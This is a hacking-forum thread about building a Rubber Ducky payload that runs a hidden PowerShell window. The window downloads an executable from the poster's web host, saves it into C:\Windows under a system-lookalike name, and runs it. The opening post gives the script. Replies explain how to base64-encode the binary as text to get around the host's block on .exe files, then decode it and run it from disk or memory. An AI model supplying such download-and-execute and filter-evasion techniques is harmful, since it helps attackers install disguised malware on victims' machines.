Jump to content
Hak5 Forums

Recommended Posts

Hi everyone, I'm trying to make a powershell wget and execute payload for the ducky but 000webhosting, my usual go-to webhost, doesn't allow .exe files. I was wondering if there was another hosting site that is free and does allow exes, or if there is some way I can encode the payload or something similar to get around such a block. I thought you might be able to encode it using base 64 in a text file, but I don't know how I'd make the powershell convert it from plaintext to binary using base64.

I was thinking something like this.

Any help is appreciated. Here is my script so far: 

$source = "mysite.com/executables/system32.exe"; $destination = "C:\Windows\system32helper.exe"; Invoke-WebRequest $source -OutFile $destination;
start-process system32.exe

That gets entered into a hidden powershell window. 

Thank you for your time. 

Share this post


Link to post
Share on other sites

Welp, you can always get a vps and host it.

 

Or better yet, instead of everyone looking for hosting for exe files, why not base64 encode it and store it as a txt file.  Download that string, convert back to bytes and then write to drive or memory and execute.

Share this post


Link to post
Share on other sites

That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell. 

Share this post


Link to post
Share on other sites
On 5/9/2018 at 6:34 PM, Finianb1 said:

That's what I wanted to figure out, was how to do such a base64 encoding and decoding in PowerShell. 

Instead of just giving the answer, the answer is the second answer here for handing binary files.  I tried to find a page to discuss it but everyone seems to be encoding text more than binary out there.

https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64

 

The premise is this.  You use the "[System.IO.File]::ReadAllBytes(<full path to binary>)" method from .net to read all bytes of the binary which will make a byte array and then use [convert]::ToBase64String() to convert that to base64 and save that string to a text file to host.  You Posh script should download that contents of that text file and decode it from base64 and then you can write back out the bytes to the disk to run from disk as the original file or do whatever else you were going to do with it.

If the file was text like a script you would user [System.IO.File]::ReadAllText(<full path to text file>) and then use "[System.Text.Encoding]::ASCII.GetBytes(<string object>)" to convert to bytes to encode in base64.  If you plan on using the 

 

.NET functions do not take relative paths to files as parameters so you will have to use the full path to the file when reading them in.

"$(Resolve-Path -Path <relative path to file>).path" can be used to convert relative path to full path before passing to the .net functions.

 

 

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×